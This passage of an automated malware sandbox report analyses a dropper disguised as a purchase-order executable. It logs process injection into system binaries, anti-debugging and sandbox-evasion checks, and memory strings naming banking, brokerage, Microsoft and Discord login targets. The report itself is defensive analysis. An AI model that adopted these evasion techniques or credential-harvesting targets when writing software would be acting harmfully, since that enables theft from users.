Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004145E3 push edx; ret 2_2_00414605
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040159A push esi; iretd 2_2_004015F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406FD7 push cs; ret 2_2_00406FD8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407784 push esi; iretd 2_2_0040779A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EF85 pushad ; ret 2_2_0041EF4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AF8E push ebp; retf 2_2_0040AFA2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004037A0 push eax; ret 2_2_004037A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390283D push eax; iretd 2_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03901368 push eax; iretd 2_2_03901369
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04894EE9 push ebx; iretd 3_2_04894EEA
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0489570E push edi; iretd 3_2_0489571C
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_048968BC pushfd ; ret 3_2_04896917
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_048881BF push esi; iretd 3_2_048881D5
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0489F9C0 pushad ; ret 3_2_0489F986
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0488B9D2 push ebp; retf 3_2_0488B9DD
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04887A12 push cs; ret 3_2_04887A13
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04886A40 push ds; ret 3_2_04886A4B
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04889253 push edi; ret 3_2_048892DF
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02E609AD push ecx; mov dword ptr [esp], ecx 5_2_02E609B6
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0016F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0016F98E
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001E1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_001E1C41
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep | graph_0-99048
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | API/Special instruction interceptor: Address: 36E0684
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Window / User API: threadDelayed 9842
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788 | Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788 | Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788 | Thread sleep count: 9842 > 30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788 | Thread sleep time: -19684000s >= -30000s
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428 | Thread sleep time: -95000s >= -30000s
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428 | Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428 | Thread sleep time: -54000s >= -30000s
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428 | Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428 | Thread sleep time: -43000s >= -30000s
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0018C2A2 FindFirstFileExW, 0_2_0018C2A2
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C68EE FindFirstFileW,FindClose, 0_2_001C68EE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_001C698F
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001BD076
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001BD3A9
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C9642
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C979D
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_001C9B2B
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001BDBBE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_001C5C97
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_0035C380 FindFirstFileW,FindNextFileW,FindClose, 5_2_0035C380
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_001542DE
Source: 7466H3538.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 7466H3538.5.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: 7466H3538.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 7466H3538.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 7466H3538.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 7466H3538.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 7466H3538.5.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 7466H3538.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2627419772.000002126F1CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 7466H3538.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 7466H3538.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 7466H3538.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 7466H3538.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 7466H3538.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 7466H3538.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 7466H3538.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4509351410.00000000010DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: 7466H3538.5.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 7466H3538.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 7466H3538.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417A93 LdrLoadDll, 2_2_00417A93
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001CEAA2 BlockInput, 0_2_001CEAA2
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00182622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00182622
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_001542DE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00174CE8 mov eax, dword ptr fs:[00000030h] 0_2_00174CE8
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_036E0950 mov eax, dword ptr fs:[00000030h] 0_2_036E0950
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_036E08F0 mov eax, dword ptr fs:[00000030h] 0_2_036E08F0
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_036DF2D0 mov eax, dword ptr fs:[00000030h] 0_2_036DF2D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h] 2_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h] 2_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h] 2_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h] 2_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h] 2_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h] 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h] 2_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h] 2_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h] 2_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] 2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] 2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h] 2_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h] 2_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h] 2_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h] 2_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
